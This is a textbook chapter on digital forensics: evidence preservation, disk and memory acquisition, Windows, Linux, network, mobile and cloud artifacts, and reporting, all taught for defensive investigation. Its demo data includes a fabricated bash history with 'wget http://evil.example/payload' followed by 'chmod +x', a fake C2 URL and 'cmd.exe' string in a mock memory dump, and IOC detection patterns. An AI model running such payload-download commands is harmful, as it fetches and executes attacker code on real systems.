Chapter 27: Digital Forensics¶
Overview¶
Digital forensics is the application of scientific methods to collect, preserve, analyze, and present digital evidence in a manner that maintains its integrity and admissibility. From evidence acquisition through court-ready reporting, forensic analysts reconstruct what happened, when, and by whom — answering questions that determine criminal liability, civil damages, regulatory compliance, and security posture improvements. This chapter covers forensic methodology, disk forensics, memory forensics, network forensics, mobile forensics, and cloud/container forensics.
Learning Objectives¶
By the end of this chapter, students SHALL be able to:
- Apply the forensic process (preservation, acquisition, analysis, reporting) correctly
- Perform forensic disk acquisition with proper write-blocking and chain of custody
- Analyze Windows and Linux file systems to recover artifacts, deleted files, and timelines
- Conduct network forensics using packet captures and NetFlow analysis
- Perform mobile device forensics using industry-standard tools
- Adapt forensic methodology for cloud environments and containerized workloads
Prerequisites¶
- Chapter 9 (Incident Response Lifecycle)
- Basic understanding of file systems (NTFS, ext4)
- Familiarity with Linux command line
- Chapter 18 (Malware Analysis) for memory forensics context
Why This Matters¶
Improper digital forensics can render evidence inadmissible, enable guilty parties to escape accountability, and prevent organizations from understanding root causes. In the Target breach (2013), forensic analysis traced the theft of 40 million credit card records back to an HVAC vendor's compromised credentials. In the Sony Pictures hack (2014), forensic analysis of the wiper malware identified Korean-language settings in its build environment, supporting attribution. Without rigorous forensic methodology, these attributions would have been impossible.
27.1 Forensic Principles and Legal Foundation¶
27.1.1 Core Forensic Principles¶
| Principle | Description |
|---|---|
| Preservation | Never modify original evidence; work from verified copies |
| Documentation | Record every action taken, tool used, and result observed |
| Chain of Custody | Track who possessed evidence, when, and under what conditions |
| Reproducibility | Another examiner with the same tools and evidence MUST reach the same conclusions |
| Integrity | Cryptographic hashes verify evidence was not altered |
| Relevance | Collect only evidence relevant to the investigation |
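The Integrity principle is enforced with cryptographic hashes recorded at acquisition time and re-checked before every analysis session. A minimal sketch of that check is below; `verify_evidence` is a hypothetical helper name (not a standard tool), and the `/tmp` paths are demo stand-ins for a real image and its hash log.

```shell
# verify_evidence IMAGE HASHFILE — recompute SHA-256 and compare it against
# the hash recorded at acquisition time
verify_evidence() {
  image="$1"; hashfile="$2"
  recorded=$(awk '{print $1}' "$hashfile")          # hash recorded at acquisition
  current=$(sha256sum "$image" | awk '{print $1}')  # hash of the copy right now
  [ "$recorded" = "$current" ] && echo "MATCH" || echo "MISMATCH"
}

# Demo: a scratch file stands in for a disk image
printf 'demo evidence' > /tmp/demo.dd
sha256sum /tmp/demo.dd > /tmp/demo.dd.sha256
verify_evidence /tmp/demo.dd /tmp/demo.dd.sha256   # MATCH
```

Any alteration of the image after acquisition, even a single byte, flips the result to MISMATCH, which is exactly what makes hashes usable as tamper evidence.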
27.1.2 Legal Framework¶
EVIDENCE ADMISSIBILITY REQUIREMENTS:
United States (Federal Rules of Evidence):
├── Rule 901: Authentication — evidence is what it purports to be
├── Rule 902: Self-authenticating — digital records with proper certification
├── Rule 1002-1003: Best evidence rule — original preferred
└── Daubert Standard: Expert testimony must be scientifically valid
Chain of Custody Documentation:
├── Who collected the evidence
├── When (timestamp with timezone)
├── Where (physical location)
├── How (tools and method)
├── What condition it was in
├── All transfers of possession documented
└── Storage conditions during preservation
27.1.3 Order of Volatility¶
Evidence SHALL be collected from most volatile to least volatile:
1. CPU registers, cache → seconds
2. RAM (physical memory) → until powered off
3. Network connections, routing tables → minutes
4. Running processes → until process terminates
5. Open files, temp files → until file closed/deleted
6. Disk (non-volatile storage) → until overwritten
7. Remote logging, SIEM, cloud logs → retention policy dependent
8. Physical media (tapes, printed docs) → years
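The ordering above translates directly into a live-response collection script: RAM-resident state (processes, sockets, routing) is captured first, then everything is hashed. This is a minimal sketch; `EVIDENCE_DIR` is illustrative and in a real case points at external media, never the suspect's own disk.

```shell
# Minimal live-response collection following the order of volatility
EVIDENCE_DIR=/tmp/live_response_demo
mkdir -p "$EVIDENCE_DIR"

# Record when collection began (UTC, per chain-of-custody practice)
date -u +"%Y-%m-%dT%H:%M:%SZ" > "$EVIDENCE_DIR/collection_start.txt"

# Most volatile first: process table and network state live only in RAM
ps auxww > "$EVIDENCE_DIR/processes.txt"
ss -tulnap > "$EVIDENCE_DIR/sockets.txt" 2>/dev/null || true
cat /proc/net/route > "$EVIDENCE_DIR/route.txt" 2>/dev/null || true

# Logged-in users come next
who > "$EVIDENCE_DIR/who.txt" 2>/dev/null || true

# Hash everything collected so later alteration is detectable
( cd "$EVIDENCE_DIR" && sha256sum * > collection.sha256 )
```

Note the trade-off: running any command on a live system perturbs it slightly, so each command used SHOULD itself be documented as part of the collection record.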
27.2 Evidence Acquisition¶
27.2.1 Disk Acquisition¶
# NEVER analyze original media directly
# Always create a forensic copy (bit-for-bit duplicate)
# Write blocker — hardware or software
# Hardware preferred: Tableau Forensic Bridge, WiebeTech
# Prevent any writes to source disk during acquisition
# dcfldd — enhanced dd with hashing
dcfldd if=/dev/sdb of=/evidence/target_disk.dd \
    hash=sha256 \
    hashlog=/evidence/target_disk.sha256 \
    bs=4096 \
    conv=noerror,sync
# Verify acquisition integrity
sha256sum /evidence/target_disk.dd
# Compare to hash generated during acquisition — MUST match
# FTK Imager (Windows) — industry standard GUI tool
# Creates .E01 (EnCase Expert Witness) format with embedded hashes
# Logical / triage acquisition (when full physical imaging is not possible)
# Active systems — targeted collection of specific artifacts
# KAPE (Kroll Artifact Parser and Extractor)
# Write output to a separate collection drive, never the source volume
kape.exe --tsource C: --tdest D:\evidence\triage\ --target !SANS_Triage
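The acquire-then-verify workflow can be rehearsed safely by imaging a scratch file with plain `dd` instead of a real device, so no write blocker is needed. The paths and sizes below are arbitrary demo values.

```shell
# A scratch file stands in for /dev/sdb so this runs without a write blocker
SRC=/tmp/source_disk.bin
IMG=/tmp/acquired.dd
dd if=/dev/urandom of="$SRC" bs=4096 count=16 2>/dev/null   # 64 KiB fake "disk"

# Acquire: bit-for-bit copy; conv=noerror,sync pads unreadable blocks with
# zeros instead of aborting, keeping offsets aligned with the source
dd if="$SRC" of="$IMG" bs=4096 conv=noerror,sync 2>/dev/null

# Verify: source and image hashes MUST match before any analysis begins
src_hash=$(sha256sum "$SRC" | awk '{print $1}')
img_hash=$(sha256sum "$IMG" | awk '{print $1}')
[ "$src_hash" = "$img_hash" ] && echo "VERIFIED" || echo "ACQUISITION FAILED"
```

On damaged media the padded zero blocks mean the image hash will legitimately differ from a hash of the raw device, which is why the per-block hash logs that dcfldd produces matter in practice.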
27.2.2 Memory Acquisition¶
# Windows live memory
winpmem_mini_x64_rc2.exe C:\Evidence\memory.raw
# Alternative: DumpIt, Belkasoft RAM Capturer, FTK Imager (memory)
# Linux live memory
# LiME (Linux Memory Extractor) — loadable kernel module
git clone https://github.com/504ensicsLabs/LiME
cd LiME/src && make
# Write the dump to external media, not the suspect disk, to avoid
# overwriting evidence; /tmp is used here only for illustration
sudo insmod lime-$(uname -r).ko "path=/tmp/memory.lime format=lime"
# Virtual machine memory
# VMware: Suspend → examine .vmem file
# Hyper-V: Checkpoint creates AVHD/AVHDX (includes RAM)
# VirtualBox: Take snapshot → includes RAM state
# Verify
sha256sum memory.raw > memory.raw.sha256
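Before a full framework analysis (e.g., with a memory forensics tool such as Volatility), a quick `strings` pass over the dump often surfaces URLs, IP addresses, and command lines. The sketch below fabricates a tiny dump so it runs anywhere; the IOC patterns are examples, not a complete list.

```shell
# A fabricated dump file stands in for a real acquisition
DUMP=/tmp/memory_demo.raw
printf 'random\000\001http://evil.example/c2\000cmd.exe /c whoami\000' > "$DUMP"

# -a scans the whole file, -t x prints the hex offset of each printable run;
# the offsets let you return to the same region with a hex viewer later
strings -a -t x "$DUMP" | grep -Ei 'https?://|cmd\.exe'
```

This is triage only: strings output has no process context, so every hit still needs confirmation against structured memory analysis.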
27.2.3 Chain of Custody Form¶
DIGITAL EVIDENCE CHAIN OF CUSTODY FORM
════════════════════════════════════════════════════════
Case Number: IR-2026-0142
Evidence Number: DISK-001
Description: WD Black 2TB SSD, Serial# WD-XXXXXXXXXX
Collection Date/Time: 2026-01-15 14:37:22 UTC
Collection Location: Finance Department, Server Room B
Collected By: Jane Smith, GCFE #12345
Collection Method: FTK Imager 4.7.1.2, write-blocked via Tableau TD3
SHA256 (source): e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA256 (copy): e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Match: YES ✓
Packaging: Heat-sealed anti-static bag, tamper-evident seal #A7821
Storage: Evidence locker #14, controlled access, 68°F, <50% humidity
TRANSFER LOG:
Date | From | To | Reason | Seal Intact?
2026-01-15 | Jane Smith | Evidence Locker | Initial storage | N/A
2026-01-16 | Evidence Locker | Lab Room 3 | Analysis begins | YES ✓
════════════════════════════════════════════════════════
27.3 Windows Forensic Artifacts¶
27.3.1 Critical Windows Artifact Locations¶
| Artifact | Location | Forensic Value |
|---|---|---|
| Registry | C:\Windows\System32\config\{SAM,SYSTEM,SOFTWARE,SECURITY}; NTUSER.DAT in each user profile (C:\Users\<user>\) | User accounts, installed software, USB history, run keys, typed URLs |
| Event Logs | C:\Windows\System32\winevt\Logs\ | Logon events, process creation, PowerShell, object access |
| Prefetch | C:\Windows\Prefetch\ | Evidence programs executed (name, count, last run time) |
| LNK Files | %APPDATA%\Microsoft\Windows\Recent\ | Files opened (full path, timestamps, even from removable media) |
| Shellbags | HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell | Folders accessed (persists after deletion) |
| SRUM | C:\Windows\System32\sru\SRUDB.dat | App resource usage, network usage per application |
| Browser History | %LOCALAPPDATA%\Google\Chrome\User Data\, %LOCALAPPDATA%\Microsoft\Edge\User Data\, %APPDATA%\Mozilla\Firefox\Profiles\ | Websites visited, downloads, form data |
| Pagefile/Hiberfil | C:\pagefile.sys, C:\hiberfil.sys | Volatile memory artifacts spilled to disk |
| Volume Shadow Copies | System Volume Information | Previous versions of files (if not deleted) |
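Most of the artifacts above (MFT records, registry keys, LNK files) store timestamps as Windows FILETIME values: 100-nanosecond ticks since 1601-01-01 UTC. Converting them to Unix epoch seconds is a fixed-offset calculation, sketched below; the sample values are illustrative.

```shell
# Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to Unix
# epoch seconds. 11644473600 is the fixed 1601->1970 offset in seconds.
filetime_to_unix() {
  echo $(( $1 / 10000000 - 11644473600 ))   # integer seconds; sub-second dropped
}

filetime_to_unix 116444736000000000   # 0 (the Unix epoch itself)
filetime_to_unix 132537600000000000   # 1609286400 = 2020-12-30T00:00:00Z
```

Getting this conversion wrong shifts every event in a reconstructed timeline, so examiners routinely sanity-check their tooling against known FILETIME/epoch pairs like the ones above.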
27.3.2 Windows Registry Forensics¶
# RegRipper — automated registry artifact extraction
rip.pl -r /evidence/NTUSER.DAT -f ntuser
rip.pl -r /evidence/SYSTEM -f system
rip.pl -r /evidence/SOFTWARE -f software
# USB device history (SYSTEM hive)
# HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
rip.pl -r /evidence/SYSTEM -p usbstor
# Most recently used (MRU) files (NTUSER.DAT)
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
rip.pl -r /evidence/NTUSER.DAT -p recentdocs
# UserAssist — GUI program execution count + last run
rip.pl -r /evidence/NTUSER.DAT -p userassist
# Run keys — persistence mechanisms
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (NTUSER.DAT)
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (SOFTWARE hive)
rip.pl -r /evidence/NTUSER.DAT -p run
rip.pl -r /evidence/SOFTWARE -p run
27.3.3 Windows Event Log Analysis¶
# Key Event IDs for forensic analysis
# Authentication
# 4624 - Successful logon (Type: 2=local, 3=network, 10=RDP, 11=cached)
# 4625 - Failed logon (SubStatus indicates reason)
# 4648 - Explicit credential logon (runas, scheduled tasks)
# 4768 - Kerberos TGT requested
# 4776 - NTLM authentication
# Process
# 4688 - Process created (requires process tracking enabled)
# 4689 - Process terminated
# Account Changes
# 4720 - User account created
# 4722 - User account enabled
# 4723/4724 - Password change/reset
# 4728/4732 - User added to security group
# Object Access (requires SACL configured)
# 4663 - Object accessed
# 4660 - Object deleted
# PowerShell
# 4103 - Pipeline execution (Module logging)
# 4104 - Script block logging (captures full script)
# Get PowerShell execution history
Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational |
Where-Object {$_.Id -eq 4104} |
Select-Object TimeCreated, Message |
Export-Csv powershell_history.csv -NoTypeInformation
27.3.4 Windows Timeline Reconstruction¶
# Plaso/log2timeline — comprehensive timeline generator
# Parse all artifacts and create super-timeline
log2timeline.py --storage-file /evidence/timeline.plaso \
    --partitions all \
    /evidence/target_disk.dd
# Filter timeline (psort)
psort.py -z UTC -o l2tcsv /evidence/timeline.plaso \
"date > '2026-01-14 00:00:00' AND date < '2026-01-16 00:00:00'" \
> /evidence/filtered_timeline.csv
# Mactime (from SleuthKit)
fls -r -m / target_disk.dd > bodyfile.txt
mactime -b bodyfile.txt -d 2026-01-14..2026-01-16 > mactime_timeline.csv  # -d = comma-delimited output
27.4 Linux Forensic Artifacts¶
27.4.1 Critical Linux Artifact Locations¶
| Artifact | Location | Forensic Value |
|---|---|---|
| Auth logs | /var/log/auth.log, /var/log/secure | Login attempts, sudo usage, SSH |
| Bash history | ~/.bash_history, /root/.bash_history | Commands executed |
| Cron jobs | /etc/cron*, /var/spool/cron | Persistence mechanisms |
| Startup scripts | /etc/rc.d/, /etc/init.d/, systemd units | Persistence |
| SSH authorized_keys | ~/.ssh/authorized_keys | Backdoor access keys |
| Syslog | /var/log/syslog, /var/log/messages | System events |
| Audit log | /var/log/audit/audit.log | File access, system calls (if auditd) |
| Web server logs | /var/log/apache2/, /var/log/nginx/ | Web-based attacks |
| Recently modified | find / -mtime -7 | Files changed in last 7 days |
| /tmp /dev/shm | /tmp, /dev/shm | Malware staging areas |
# Linux forensic triage commands
# (Run on live system or via chroot on mounted image)
# Find recently modified files
find / -newer /tmp/reference_time -type f 2>/dev/null | grep -v "/proc\|/sys\|/dev"
# Hidden directories/files
find / -name ".*" -type d 2>/dev/null | grep -v ".config\|.local"
# SUID/SGID files (privilege escalation)
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Network connections
ss -tulnap
netstat -anp
# Running processes
ps auxf
ls -la /proc/*/exe 2>/dev/null | grep deleted # Deleted but running binaries
# Scheduled tasks (all cron locations)
for spool in /var/spool/cron/crontabs/*; do echo "--- $spool ---"; cat "$spool"; done
cat /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/*
# Users and groups
cat /etc/passwd | grep -v nologin | grep -v false # Interactive users
lastlog # Last login for all users
last -100 # Recent logins
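When `HISTTIMEFORMAT` was set on the suspect system, `~/.bash_history` stores a `#<epoch>` comment line before each command; pairing them back up yields a per-command timeline. The sketch below uses a fabricated history file; the marker-pairing logic is the point, not the sample commands.

```shell
# Fabricated history file; real ones live at ~/.bash_history per user
cat > /tmp/hist_demo <<'EOF'
#1736899200
wget http://evil.example/payload
#1736899260
chmod +x payload
EOF

# Pair each '#epoch' marker with the command that follows it
awk '/^#[0-9]+$/ { ts = substr($0, 2); next } { print ts, $0 }' /tmp/hist_demo
```

Without `HISTTIMEFORMAT`, bash history has no timestamps at all, so command ordering must be corroborated from other artifacts (auth logs, file mtimes).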
27.5 Network Forensics¶
27.5.1 Packet Capture Analysis¶
# Wireshark — GUI packet analysis
# Capture filter (during capture): host 192.168.1.100 and port not 80
# Display filter (post-capture): ip.addr == 192.168.1.100 && http
# TShark — command line Wireshark
# Extract all HTTP POST requests
tshark -r capture.pcap -Y "http.request.method == POST" \
-T fields -e frame.time -e ip.src -e ip.dst -e http.request.uri -e http.file_data
# Reconstruct files from capture
NetworkMiner -r capture.pcap # Extracts files, credentials, DNS
# Follow a TCP stream (the final argument to -z follow is the stream index,
# not an IP — list candidate stream indexes for an IP of interest first)
tshark -r capture.pcap -Y "ip.addr == 185.220.1.1" -T fields -e tcp.stream | sort -un
tshark -r capture.pcap -qz follow,tcp,ascii,0
# Extract DNS queries (C2 detection)
tshark -r capture.pcap -Y "dns.flags.response == 0" \
-T fields -e frame.time -e ip.src -e dns.qry.name
# Zeek — network security monitoring (production-grade)
zeek -r capture.pcap local
# Generates: conn.log, dns.log, http.log, ssl.log, weird.log, files.log, etc.
cat conn.log | zeek-cut ts id.orig_h id.resp_h id.resp_p duration orig_bytes
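Where `zeek-cut` is unavailable, plain `awk` can pull the same columns from a TSV `conn.log`. The sketch below fabricates two rows in the default field order (ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto, service, duration, orig_bytes) and flags long-lived, high-volume flows; the 600 s / 10 MB thresholds are arbitrary demo values.

```shell
# Two fabricated conn.log rows in the default field order
printf '1736900000.1\tC1\t10.0.0.5\t49152\t185.220.1.1\t443\ttcp\tssl\t3600.0\t52000000\n' > /tmp/conn_demo.log
printf '1736900010.2\tC2\t10.0.0.7\t49153\t8.8.8.8\t53\tudp\tdns\t0.2\t120\n' >> /tmp/conn_demo.log

# Flag long-lived, high-volume flows (possible exfiltration):
# duration > 600 s and more than 10 MB sent by the internal host
awk -F'\t' '$9 > 600 && $10 > 10000000 { print $3, "->", $5, $10, "bytes" }' /tmp/conn_demo.log
```

Real conn.log files carry a commented header block describing the field order, so the column positions SHOULD be checked against that header rather than assumed.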
27.5.2 NetFlow Analysis¶
# nfdump — analyze NetFlow/IPFIX data
# Find top talkers
nfdump -r /netflow/nfcapd.202601150000 -s srcip/bytes -n 20
# Find connections to known bad IPs
nfdump -R /netflow/nfcapd.202601150000:nfcapd.202601160000 \
    "dst net 185.220.1.0/24" \
    -o extended
# Detect port scanning
nfdump -r /netflow/nfcapd.202601150000 \
"flags S and not flags AFRP" \
-s srcip/flows -n 20
27.6 Mobile Device Forensics¶
27.6.1 Mobile Forensic Process¶
MOBILE FORENSIC ACQUISITION TYPES:
1. Manual Extraction
- Photographing the screen
- Limited; no deleted data
- No tools required
2. Logical Acquisition
- Uses device's backup protocol (iTunes, ADB)
- Active data only; no deleted files
- Tools: Cellebrite UFED, Oxygen, GrayKey
3. File System Acquisition
- Full file system via USB
- Requires device unlock or exploit
- Recovers most deleted data
4. Physical Acquisition (Full Chip-Off)
- NAND chip physically removed and read
- Most complete; destructive
- Requires specialized hardware
- Tools: Cellebrite UFED, MSAB XRY
5. Cloud Extraction
- iCloud, Google Account, Samsung Cloud
- Backup data only; requires credentials or legal process
27.6.2 Cellebrite UFED — Industry Standard¶
Cellebrite UFED (Universal Forensic Extraction Device):
├── Supports 30,000+ device profiles
├── Android: ADB, MTK exploit, custom bootloader, chip-off
├── iOS: Logical backup (iTunes), BFU (Before First Unlock) extraction,
│ AFU (After First Unlock) via GrayKey/Cellebrite Premium
└── Output: UFDR file analyzed in Cellebrite Physical Analyzer
Key Artifacts Recovered:
├── SMS/iMessage (including deleted)
├── Call logs
├── WhatsApp, Signal, Telegram messages
├── Location history (GPS, cell towers, WiFi)
├── Browsing history
├── Photos/videos (including deleted)
├── Application data (banking apps, email)
└── Password keychain (iOS, if unlocked)
27.7 Cloud and Container Forensics¶
27.7.1 Cloud Forensic Challenges¶
Traditional Forensics → Cloud Forensics:
├── Disk image → API-based log export only
├── Physical server → No direct hardware access
├── RAM dump → Not available for managed services
├── Network capture → VPC Flow Logs (metadata only, not payload)
└── Chain of custody → Legal hold via cloud provider APIs
27.7.2 AWS Forensic Process¶
# Preserve evidence — create forensic volume from snapshot
INSTANCE_ID="i-0abc123def456789"
# 1. Create snapshot of each volume
VOLUME_IDS=$(aws ec2 describe-instances --instance-ids $INSTANCE_ID \
--query "Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId" \
--output text)
for VOL_ID in $VOLUME_IDS; do
aws ec2 create-snapshot \
--volume-id $VOL_ID \
--description "Forensic snapshot - IR-2026-0142 - $(date -u +%Y%m%d-%H%M%S)" \
--tag-specifications "ResourceType=snapshot,Tags=[{Key=Purpose,Value=Forensics},{Key=Case,Value=IR-2026-0142}]"
done
# 2. Isolate instance — swap its security groups for a deny-all isolation SG
# (revoking individual rules is error-prone; an SG with no rules blocks all
# ingress, and removing egress rules blocks outbound C2)
aws ec2 modify-instance-attribute --instance-id $INSTANCE_ID --groups sg-isolation
# Optionally permit analyst SSH only, via a dedicated forensics SG
aws ec2 authorize-security-group-ingress --group-id sg-forensics --protocol tcp --port 22 --cidr ANALYST_IP/32
# 3. Export CloudTrail for investigation period
aws cloudtrail lookup-events \
--start-time 2026-01-01T00:00:00Z \
--end-time 2026-01-15T23:59:59Z \
--max-results 50 \
> cloudtrail_evidence.json
# 4. Create forensic workstation in same region
# Attach a volume built from the forensic snapshot and mount it read-only at
# the OS level (EBS has no read-only attach mode); DeleteOnTermination=false
# preserves the evidence volume if the workstation is terminated
aws ec2 run-instances --image-id ami-forensics --instance-type t3.xlarge \
    --block-device-mappings "[{\"DeviceName\":\"/dev/xvdf\",\"Ebs\":{\"SnapshotId\":\"$SNAP_ID\",\"DeleteOnTermination\":false}}]"
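Once the CloudTrail export exists, even a grep-level triage can surface anti-forensic API activity before deeper analysis. The sketch below fabricates a two-event export standing in for `cloudtrail_evidence.json`; DeleteTrail, StopLogging, and PutEventSelectors are real CloudTrail management events attackers use to blind logging.

```shell
# Fabricated two-event export standing in for cloudtrail_evidence.json
cat > /tmp/cloudtrail_demo.json <<'EOF'
{"Events":[{"EventName":"ConsoleLogin","Username":"alice"},{"EventName":"DeleteTrail","Username":"mallory"}]}
EOF

# DeleteTrail / StopLogging / PutEventSelectors are classic anti-forensic calls
grep -oE '"EventName":"(DeleteTrail|StopLogging|PutEventSelectors)"' /tmp/cloudtrail_demo.json
```

For real investigations a proper JSON processor (e.g., jq) is preferable, since grep cannot associate the event name with its user, time, and source IP fields.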
27.8 Forensic Reporting¶
27.8.1 Forensic Report Structure¶
DIGITAL FORENSIC EXAMINATION REPORT
EXECUTIVE SUMMARY
- Case overview, key findings, conclusions
EXAMINER INFORMATION
- Name, certifications, organization, contact
EVIDENCE RECEIVED
- Evidence item list with hashes, acquisition date, chain of custody
FORENSIC TOOLS USED
- Tool name, version, validation status
EXAMINATION METHODOLOGY
- Step-by-step process followed
FINDINGS
- Finding 1: [Timestamped event with evidence references]
- Finding 2: [...]
- ...
(Each finding: description, evidence basis, artifact location, screenshot/log)
TIMELINE (Chronological)
- Complete reconstructed timeline from earliest to latest event
CONCLUSIONS
- Answer to specific investigative questions
- Limitations of analysis
APPENDICES
A: Hash values
B: Tool outputs
C: Evidence photographs
D: Glossary
27.9 Certifications and Career Path¶
| Certification | Organization | Level | Focus |
|---|---|---|---|
| GCFE (GIAC Certified Forensic Examiner) | GIAC/SANS | Intermediate | Windows forensics |
| GCFA (GIAC Certified Forensic Analyst) | GIAC/SANS | Advanced | Advanced forensics + IR |
| EnCE (EnCase Certified Examiner) | OpenText | Advanced | EnCase platform expertise |
| CCE (Certified Computer Examiner) | ISFCE | Advanced | Vendor-neutral DFIR |
| CFCE (Certified Forensic Computer Examiner) | IACIS | Advanced | Law enforcement focus |
| CHFI (Computer Hacking Forensic Investigator) | EC-Council | Intermediate | Broad forensics overview |
27.10 Benchmark Controls¶
| Control ID | Title | Requirement |
|---|---|---|
| Nexus SecOps-DF-01 | Forensic Readiness | Documented forensic readiness plan; tools staged and validated |
| Nexus SecOps-DF-02 | Log Retention | Security logs retained for minimum 12 months; immutable storage |
| Nexus SecOps-DF-03 | Chain of Custody | Formal evidence handling procedures documented and trained |
| Nexus SecOps-DF-04 | Forensic Capability | At minimum one GCFE/GCFA-certified analyst on team or retainer |
| Nexus SecOps-DF-05 | Cloud Forensics | Cloud forensic procedures documented for each cloud provider used |
| Nexus SecOps-DF-06 | Legal Hold | Documented process for evidence preservation upon legal notification |
Exam Prep & Certifications¶
Relevant Certifications
The topics in this chapter align with the following certifications:
- GIAC GCFE — Domains: Windows Forensics, Evidence Preservation, Artifact Analysis
- GIAC GCFA — Domains: Advanced Forensic Analysis, Memory Forensics, Timeline Analysis
- EnCE — Domains: Digital Evidence Collection, EnCase Forensic Methodology
- GIAC GCIH — Domains: Incident Handling, Forensic Investigation
Key Terms¶
Chain of Custody — The documented record of every person who had possession of evidence from collection through presentation, ensuring its integrity and admissibility.
KAPE (Kroll Artifact Parser and Extractor) — A forensic triage tool that efficiently collects and processes common forensic artifacts from Windows systems.
MFT ($MFT — Master File Table) — NTFS data structure containing records for every file and directory on a volume, including filename, timestamps, attributes, and physical location.
Order of Volatility — The principle that forensic collection should proceed from most volatile (RAM) to least volatile (physical media) to preserve the maximum amount of evidence.
Plaso / log2timeline — An open-source forensic timeline tool that parses hundreds of artifact types and creates a unified super-timeline for analysis.
Write Blocker — Hardware or software device that intercepts write commands to a storage device, ensuring forensic acquisition does not modify the original evidence.